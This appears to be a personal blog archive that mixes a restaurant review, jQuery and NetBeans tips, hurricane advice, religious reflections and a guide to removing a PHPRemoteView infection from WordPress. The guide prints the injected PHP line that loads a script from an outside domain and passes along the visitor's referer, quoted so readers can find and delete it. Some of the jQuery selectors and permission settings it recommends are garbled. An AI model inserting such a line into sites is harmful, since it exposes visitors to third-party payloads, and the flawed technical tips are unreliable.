I don’t usually do reviews of oriental food restaurants, but in the case of Kumo, I want to do an exception because their food, excellent attention and fair prices are a very good deal.

Location

It is not so far from Cortelyou Road Station, its about a block from there going to Coney Island avenue.

Menu, Prices and Attention

Their prices are fair and the attention is excellent. The waitress are very kind and warm and at the minimum sign of the client they go to attend you. Their menu is very wide : soups, salads, hot appetizers, sushi appetisers as well bar entries and sushi a la carte, tempura, katsu, teriyaki, donburi, hibachi, udon… its quite extensive to write :3

The prices are very fair : from $8 to $15 for any dishes and up to $20 when you order sushi specials. You can see what they cook, the chefs does not have nothing to hide to the clients, so you can see how they cook  while you wait your order.

Today I went to eat my favorite food : Udon Shrimp with fried green-tea ice-cream. Each shrimp has  a nice size, the vegetables are very fresh and give to the soup a very kind flavor. In case you need something the waitress watch over what you need very carefully (in my case I got a wet towel to refresh my face, the udon was kinda hot).

Ambient and Area

They play very soft music creating a very warm environment. Each table is decorated with candles and soft lights making this a correct place to have a date (I wish my wife were here to eat together, it is also very romantic, sometimes they decorate the place with roses!). The heating this winter is excellent, you will feel it when you enter to the restaurant, so there is no worries about the place. The place is very well decorated with shaded lamps on the ceiling, frames and plants.

There are large areas where you can have a nice meeting with your friends as well single tables if you go and eat by yourself. It is quite big, so consider it if you go with your family and friends to eat their food.

Overall

From 1 to 5 I can give 4 since it is my first restaurant review. I love oriental food (specially korean and japanese food), and of course I just touch the tip of what the restaurant can offer to you. The food is EXCELLENT, so you can pay over from $10 to $14 for a nice lunch or dinner.

Today I want to share the posibilities of NetBeans as a jQuery IDE for project development. It sounds hilarious, but no, it is not.

For the purpose of documentation, I will explain how to import the language preferences of jQuery, at the latest existent version (1.7.1 at this date). NetBeans IDE can also determinate the return of many functions that are included with jQuery!

Requirements

  • Having NetBeans 7 or newer
  • keep at hand the uncompressed and compressed version of jQuery

1. Lets create first a PHP project and then, lets copy and save the contents of the uncompressed version of jQuery 1.7.1, as well the compressed version

Create a empty js file that will contain the code of jQuery

2. Once you saved the files, the project files should look like this:

3. Now lets check each js file on the navigator panel. NetBeans can detect automatically all the available attributes. Somehow, the extensions (like addClass) are not shown under the navigator, but it does not matter at all.

The navigator will display the available functions, properties and objects of jQuery

4. now lets create a javascript file and lets edit a jQuery sentence such

$("body").attr("padding","0px");

5. Now we can see the code completion for all the jQuery functions. From the moment you start to write the dot after “)” you will start to see the helper:

6.now write, for example “attr”, it will show you the available options. Also it will include a cross-browser compatibility reference, and a small help as well:

With just this easy steps you can start to configure your NetBeans in a killer IDE for your daily work based on jQuery.

Everyone loves jQuery : Quick coding, ajax, browser effects, DOM exploring, etc. But what happen when a programmer (like me) keeps using only firefox for debugging and face the fact many users have problems with Internet Explorer?

I want to spend some of my time writing some of this annoying glitches to have in consideration in order to keep clean the code and to avoid that the application we develop with sweat and tears have the same effect on all browsers…

Object Notation and Arrays

jQuery uses this a lot. Everytime we define a property for an object or element, we uses arrays to define certain behaviors… for example, like creating on the fly elements:

The set of attributes of the new division or the ajax request like the examples above are contained in an Array object. From here our headaches starts when we uses IE6, 7, and 8 (seems like 9 fixes part of the object notation, but not at all). Everytime you run your application, you will have probably a popup window with your code and a message error in the beggining :

SyntaxError:Expected identifier, string or number

It usually happens when we use eval() in a Ajax request asking to check the content of a js file we want to run in the fly. Not sure if it happens if you use $.getScript() function, but again, EVAL IS EVIL!!!!!

Now, in order to avoid problems with objects and arrays, you should quote every key of the array/object:

$('<div>',{
    "id":'sprint',
    "name":'sprint',
}).appendTo('body');

In this example of creating elements on the fly, the attributes id and name are quoted in the array of keys of this div object. In IE 6,7,and 8 you will have errors if you don’t manage adequately the keys as string. if not, you are using in many case reserved words of javascript as key names, and then you may have errors in your script.

in the next code, the Ajax request has in its attributes every key quoted, and it works perfect…

So far, quoting keys make valid this kind of array/objects using old browsers. Quoting your key are required to run properly basic attributes and data sets of information using arrays.

Input Select, Input Radio problems

Eventually, evaluating selects and radio buttons can become a nightmare if we don’t refer adequately to them in Internet Explorer.

For example, in the jQuery Standard to get the selected element of a list, you usually do:

$("#contact :selected").val();

Not all the time it will work, especially if we refer to Internet Explorer. Treat Selects like this:

$("input:select [id=contact] option:selected").val();

I know, it is long, but good enough to keep referenced in our compatibility with IE.

The radiobuttons are also subject to this rule. for example, you usually will do this to get the value of the selected element in an array of radiobuttons

$("#rbuttons :checked").val();

Think twice. In IE you cannot get the value as you want (even if you check another element), So, we need again to be very specific in order our retard IE browser can understand what we want

$("input:radio[id=rbuttons]:checked").val();

Somehow using $(“#id”) is not helpful at all specially if you use IE. Next time try to remember to point directly to your objects. It is not complicated at all if you know how to do it.

I found a piece of code with a very evil eval code, starting with:

thanks to the guys of http://www.tareeinternet.com/scripts/decrypt.php , I figured out the evilness and the code is none less than our dear PHPRemoteview, but modified.

Look for files such wp-feeds-file.php with such evil eval and delete them. Also ensure 0755 or 0644 permissions for your folders and 0744 for your files, and for the sake of God, UPDATE YOUR TIMTHUMB.PHP LIBRARY!!!!

Now some characteristics of this evil eval.

The first impression I got is that this program intend to hijack your root mysql use. so be careful: always make a strong encrypted password for your root, and avoid at all cost any mysql user without password:

Be careful, it may hijack your MySQL databases if you are not careful enough...

This malware php script is capable of many things once the script take control of your site. for the mere example, it can execute kernel attacks, decrypt winnt passwords and observe over all your apache configurations:

Be prepared for a long night, this guys are going serious against your server...

If you are not careful enough, they will catch even your server passwords...

My second and final impression is that this mime of PHPremoteview can be able to crawl all our directories and files  under your www-data. Once it is infected, there is nothing you can stop it.

Alternatively, the program may allow you to run bash commands to let to the hacker know parameters such processes, ports, OS version, etc etc etc…

The hacker will be able to execute and run bash commands if your permissions are not well set up...

If you feel paranoic about your security, I suggest you to run all your folders under 644 permissions as well your files. of course, tweaks related to permissions should me made with some frequency, but at least it will protect you in a very restrictive way.

Also thanks to unkn0wn_h4ck3r[@]yahoo.com that make my nights longer for the last two weeks. I’m sure I learned something through this experience.

I have my fun times riding my bike around this place :D But sadly this weekend wont be the same like always…

After being hitten by a earthquake last tuesday, now we face a new difficulty… this 26, 27 and may be 28 of august may not be a good weekend for everyone. As you may know, the Hurricane Irene is visiting New York and we need to be prepared good enough. The pronostic says is a Category 1 Hurricane with a average speed of 86 MP/H (138.4 KM/H) and advance at an speed of 14 to 20 miles per hour. Of course I will try to record what happen over the area….

Watching the comments in many diaries, my concern about security and planning is getting hype this evening. So as a any average new yorker, it is good to keep in mind the following security tips (just in case things goes wrong):

  1. Evaluate routes to shelters: As you may know, cars may not allowed to be parked on the streets in order to make ambulances, fire cars and other emergency services go over the streets with certain freedom. So it is a good idea to look possible shelters nearby your home.
  2. No beach : If you are of the extreme guys that likes high tides for your surf table, this time is not even recomendable to go any of the beaches located over the New York and New Jersey area. Don’t look for a stupid death, look for the security of a safe place you can stay while the hurricane give us a visit.
  3. Clean your yard: If you have a mess in your yard and backyard, you need to act right away. Avoid keeping small toys, bikes and any kind of plastic toy, and save it in your basement. Think in others : you wouldn’t ask to your neighbors about your children’s toys in every house around you. May be a very unpleasant experience.
  4. Watch your windows : Even if it is small, move your furniture and avoid the window as well you can. A category 1 Hurricane can easily deliver to your window the trash you neighbor forgot to send last week. (check number 3).
  5. Food, water, batteries, radio and electronics : Keep an eye on the weather reports, and keep a supplies of water and food for one week. Batteries can be very important to keep yourself informed about new events related to the hurricane, evacuation notices and other very important information. Keep also charged all your electronic devices before the hurricane strikes.
  6. Money : Addicted to debit and credit cards? this time you may need cash in case the banking system just got black out. Keep in your pocket about $300 bucks, for your basic needs. It is not for going Macy’s and buy fancy stuff…
  7. Transportation : Keep a weekly card ready if you have access to MTA to ride BUS, NOT METRO!. Keep in mind that delays will happen over the time the hurricane pass over NY area. Also it is very advisable to avoid ride on metro since the railways may be blocked by trash delivered by courtesy of the hurricane.
  8. Security First! : Keep in mind that your safety and the safety of others starts with you. Do the correct thing and don’t play the hero : We have our cops and firemans doing their best over the time the hurricane hits ground. Call 911 if your situation just go beyond of your control and find a safe place asap. Keep always your cellphone nearby you fully charged.

Now that the hurricane comes to NY, I pray for the safety of everyone here. Please Heavenly Father protect our beloved ones and our houses, and let us continue forward against our difficulties. Amen, Aju

ok, now I want to share an experience I had today and how much we are hurting God due to our personal perceptions and wishes.

For Unificationists, God (Our Heavenly Parent and Mother) is Our Eternal Parent of all Humankind and Center of our life of Faith. Our True Parents are the Perfect Encarnation of God’s Image and they can love, speak and perceive the world as God Does. Of course I would like to take time to explain it later. But the more important thing is how we ignore God’s heart in every moment of our lives, and I want to put my experience relating this issue.

I had been walking through 34th Street & Penn Station before returning Home after the sunday service, I was looking for some Latino Food store to have a nice lunch.

No luck on it, so I went to eat in KFC. As you may know, Penn station is also a particular place to find homeless people and you may seen them many times. In short a guy just entered asking for food in a very peculiar way (very aggresive if my words can match the attitude). One man was offering from his table some of the food, willing to share with him; then the homeless guy start to say very angry:

- “I’m Sorry? What the F*** you want me to say? I’m sorry?!?!? You know what? take that food and put it in your a**!!!”

Of course, it was happening behind me, a very unpleasant experience. After that incident I take an extra drink (the buffalo wings were very spicy) and I keep my french fries for later. It took me a while to figure the need of this man for food, then I decided to give it for him.

And Oh surprise! the angry guy is back, and I’m willing to share (I feel I need to experience it in some way or another what will happen later). So I told him:

- “You are hungry right? please take my fries”

Then, as many of you may expect, he answered me with a dirtmouth answer:

- “I don’t want your sickness!! you can put your f****** package of fries and put it in your a**!!!”

After that of course I got shocked (Twice) and no other words have to say to this guy than “God Bless You”. Willing to help other person, I looked for someone else that accept it. I should not throw the food after all.

From Here, It is easy to understand why we don’t listen God in our lives even if we are looking for Him in every moment of our lives:

1. A change of attitude is required

Even if we are looking for God, we need to have the heart to accept Him unconditionally. Probably we are expecting A LOT from God. We are expecting that He can manifest in our lives in the way we want, when the reality is not. Our appreciations of our reality are very different from God’s reality. Changing the perspective of our current wishes and needs may help to understand the way God is trying to Help Us.

2. Understanding God’s wish for helping us

God is definitively the first one that come to us in our hard times. As you may know, God does cannot manifest Himself in a physical body unless we allow Him to act through our good will and kindness. Even not religious people are wandering why they act in good will and kindness and it’s very simple : The counciousness is the master of our Good acts, and it becomes from God. If you feel you want to help somebody in troubles you can do it! everything is addressed to be fulfilled depending of the good of bad purpose of an action, but definitivelly God is always looking through our counciousness that we can do acts of kindness.

3. God also feels rejection, sadness and experiment difficulties.

Thinking on what I Felt, I assumed my feeling as Heavenly Father does. God look for me in the best way He can, and offer to me the help I need. Because we are a product of fallen ancestors we are UNABLE to experiment God’s heart, we are unable also to experiment the real gifts God give us every day and instead of that we experiment a unperfected love that is just a thin layer of singular illutions created by our physical wishes. Think if you are a Parent of a child that does not listen to you and does not understand what you say. The heart is not so different from Heavenly Father since we are His creation and we have emotion, intellect and will as He does.  So He also feels rejection, anger, sadness and experiment difficulties.

Acordingly to the King James version of the Holy Bible, The word  “Anger” and the word “God” appear in the same verse 35 times:

Practically God is trying to help rebelious childs all the time. The Old Testament is a book written in terms where God is a Powerful, Merciful and Allmighty beyond of our imagination. We need to understand that we are not talking about a God with such attributes of allmighty power. What Old testament does not say is that God is a God of love, thing that the New Testament say it with clarity:

  • 1 John 4:8(KJV): 8He that loveth not knoweth not God; for God is love.
  • John 3:16(ESV) : 16For God so loved the world, that he gave his only Son, that whoever believes in him should not perish but have eternal life.
But the one can describe it better is 1 Corinthians 13:
 1If I speak in the tongues of men and of angels, but have not love, I am a noisy gong or a clanging cymbal. 2And if I have prophetic powers, and understand all mysteries and all knowledge, and if I have all faith, so as to remove mountains, but have not love, I am nothing. 3 If I give away all I have, and if I deliver up my body to be burned, but have not love, I gain nothing. 4 Love is patient and kind; love does not envy or boast; it is not arrogant 5or rude. Love is the most important force that God have. Nothing against his Love can fade its bright. For Love to us, God had sacrified Jesus to save our Sins, and True Parents had suffering 7 deaths and resurrections in order to clean the sins of all humankind through all the history. It is the same kind of love a Parent has for their childs, and even in difficult times, and rejections they love us.

And then God will become sympathetic with you, and soothing your heart will say, “You were originally created to be loved by me, but you are in satanic hands, and in order for me to save you I had to do this.” Then He will take you back to His side. That’s God’s heart — it’s His way of loving you.But if you too often betray God’s love, you leave God again after coming back to Him, He looks for you again, but you are separated farther and farther from Him. What would God’s heart be like at that moment? He would feel like beating you harder and harder and when you cling to Him again, He cannot sympathize.
    • Just imagine, if your parents love you dearly and you betray their love, sin and come back to them, they would welcome you. But if you separate from them again, and commit even more mistakes, and repent to your parents, what would they feel?You are prodigal sons, always breaking your parents’ hearts but you are so greedy that you want to be loved by your parents more than your brothers and sisters. When God looks at you being like that, what do you think He feels? We can well imagine that God is miserable looking at us. God knows that we are miserable people, but more than that. God will look at Himself always miserably because His children are in such a condition.
    • When God is so miserable, who will console His heart? Whenever God is disappointed at human beings now, He’s sure to remember sinless Adam and Eve living in happiness. Isn’t that true with you? Suppose you have sinned, when you look back to your past you repent and say, “Oh! If only I hadn’t done such a thing. I could have been happy in the bosom of my Parents. Before it is too late, I want to go back to Father and Mother” and you struggle hard to go back. You recollect the days in which you were utterly happy. Comparing your present life to life in that previous world, you want to leave this situation and go back to the original state.

An annoying morning I had today :( Checking my blog I saw a very unpleasant popup comming from my blog:

yes, I’m another victim of some hacker. but there are things we can do to counter this problem. PhpRemoteView is a hack attack well known for many people that owns wordpress blogs and a complete headache for tech support guys. Even wordpress guys does not give a clear answer about the problem.

But not worries, I find out what we need to do to rescue your blogs (and mine included). The first think we need to do is to check the sourcecode of the output page looking for something very unusual. I got an unusualcode from the bottom of my html

then go and browse the index.php on the root of your blog and remove the last line:

echo'<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

So one code down, nevertheless I still had that annoying phpRemoteView comming from my blog. I checked out my Network traffic and seems everything was working fine (sorry, no screenshot of that moment). As far my research is going, thanks to jason cosper I figured out that one of the plugins is making the trouble. So I renamed my plugins directory to plugins.bak, and voila! the site is back and able to access the WP back! No RemotePHPView login and full access to my WordPress Administration backend :D .

Nevertheless I had a couple of bad feelings. My first concern is security issues. So we need to make a general chmod to the directory. if you are the ones that uses 0777 on every file, you are asking for a easy dead. The first thing is secure your directory:

if you are root in ubuntu, do this favor to your wordpress blog and run a chmod to all your files in your blog installation:

chmod -R 0755 /www/wordpress/www.tbogard.com

My second is to find from where and when PhpRemote are being loaded somewhere in the blog, the text PhpRemote is being loaded, so lets look for it:

grep -r "PhpRemoteView" /www/wordpress/www.tbogard.com

(note : when you do a recursive grep, avoid to add a slash to the end of your wordpress blog directory, otherwise it wont work)

Aha!! there are two files with this message :

  • /wp-admin/js/config.php
    /wp-admin/common.php

there are additioonal files to look for:

  • /wp-admin/udp.php
  • /wp-content/udp.php
  • /wp-content/uploads/feed-file.php
  • /wp-content/uploads/feed-files.php

so lets search what files in my plugins.bak directory are loading such files.

Update : Certain WP Premium Template users had notified me that the file timthumb.php is the backdoor to this attack. If you use WP-Zoom templates, you should update timthumbs file here. In my case, I use Cadabrapress, and timthumb.php could be found on /wp-content/themes/cadabrapress/scripts. If you use WP-Zoom Templates, check the script folder of your template. Thanks to Benoist Rousseau for his comments.

Analizing the results and behavior of the plugins I decided to delete the wp-minify from my directory of plugins. I think wp-minify is creating the problem since os the only file that loads a “common.php” but also loads information in compressed js related to config.php that is the other phpRemoteView attack file. If you really needed, I suggest you to find another alternatives of js compression, but better avoid that for now.

Since the site is back to the normallity, we can remove this files. the bad news is you may need to reactivate your plugins.

Activate the plugins you consider very esential to your site and avoid executable PHP post for you security.

Note : Also if you use WP-Cache, CLEAR IT AT ALL!!! It may preserve some of the bad scripts. In case you couldn’t ride out the problem, delete the plugin PHISICALLY and get a new version

With this your blog is back to life.

Security measurements.

If you host many sites in your server, avoid to let any PHP script running under 0777. It is very harmful to your security. Instead of it do this as root user:

  1. Once the problem is gone, please make a favor to your wordpress and keep it updated, also update your plugins to the latest working and stable versions.
  2. Make sure you use www-data as the only owner of all the content of the web directory. If your are not sure, execute: 
    chown -R www-data:www-data /your/wordpress/directory
  3. Mase sure all the permissions are setted 0755 (it makes www-data as only owner and only www-data has permission to execute scripts under that only directory): 
    chmod -R 0755 /your/wordpress/directory
  4. Check your /var/log directory and check the log access to your site, it will provide you valuable information about the execution of the hack attack.
  5. update your ubuntu installation allowing to install the latest patches: 
    apt-get update
  6. Change passwords of your root and other users. We are not sure how deep was the attack, so it is very advisable to change passwords.
  7. Bots are your most probable source of problems since then can be able to input very complex information in your forms to exploit your blog. Protect against them using WP-reCaptcha or spam-stopper.
  8. Also a very important piece of code! update your .htaccess! (again, Thanks to Benoist Rousseau)If you want to shield your wordpress installation against RemotePhpView do this:
    1. make a copy of your .htaccess in case it does not work very well.

In the case of Rev. Jun Basuil, he was a person that gave love and teach others with an amazing humble heart. I had the privilege to meet him when I was visiting my wife in Philippines, and we spend quite good time while I was in the Unification church HQ in Manila city. I was very amazed by his attitude and concern about my relationship with my wife. Also he was very worry about members as well he could manage. He was worry about blessing candidates a lot, he always was looking in the purpose of the husbands to be matched by True Parents, and how well they are in their life of faith. I had few moments of public life with him and he was an awesome leader.

Also we had as couple the opportunity to visit his family. Young members were too happy to visit his house due to the facilities the neighborhood has, but beyond of the external comfort, the guidance and careful instructions of Rev. Basuil were a very precious gift. We were very happy to share beautiful moments that our memories will value on the next years.

I pray for the new leadership in Philippines, that can be united and focused on the directions given by our True Parents. rev. Basuil was an example for all the ones who know him about how to be a successful man in life, business, family and religious life.

See you there in the spiritual world, our steps in this land can be count, but there you can keep going with us all time with love and passion for God and True Parents.
